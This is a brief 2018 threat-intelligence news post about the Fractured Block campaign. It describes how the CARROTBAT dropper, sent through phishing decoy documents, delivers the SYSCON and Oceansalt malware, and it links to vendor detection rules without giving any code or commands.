CARROTBAT Dropper Delivers SYSCON and OceanSalt Malware

Delaware, USA – December 4, 2018 – Fractured Block campaign started in March 2018 and significantly intensified in recent months. Researchers at Palo Alto Networks’ Unit 42 division track it from the very beginning and shared their findings in the blog post. The campaign targets Southeast Asia, and the malware used allows suggesting that the campaign could be conducted by an APT group from China. Adversaries send phishing emails with CARROTBAT dropper files with embedded decoy documents. The CARROTBAT malware is an uncommon dropper that supports various types of documents and uses command obfuscation. Researchers discovered 29 unique samples used in 11 decoy documents. At the beginning of the campaign adversaries used the FTP-based RAT SYSCON as the final payload, but in last months they switched to the recently discovered Oceansalt malware. Most decoy documents were crafted to lure victims in Korea and had subject matter related to cryptocurrencies or timely political events. After the malicious attachment is executed, CARROTBAT opens lure document and download a remote file using the built-in Microsoft Windows certutil command.

Threat actors behind Fractured Block campaign used their infrastructure in the attack on a British government agency on December 2017, so their field of operation is not limited to Southeast Asia. To detect CARROTBAT dropper, SYSCON and Oceansalt malware with your security solutions, you can use rules from Threat Detection Marketplace.
OceanSalt AND SYSCON Malware Detector: https://tdm.socprime.com/tdm/info/1396/
CARROTBAT Malware Dropper Detector: https://tdm.socprime.com/tdm/info/1395/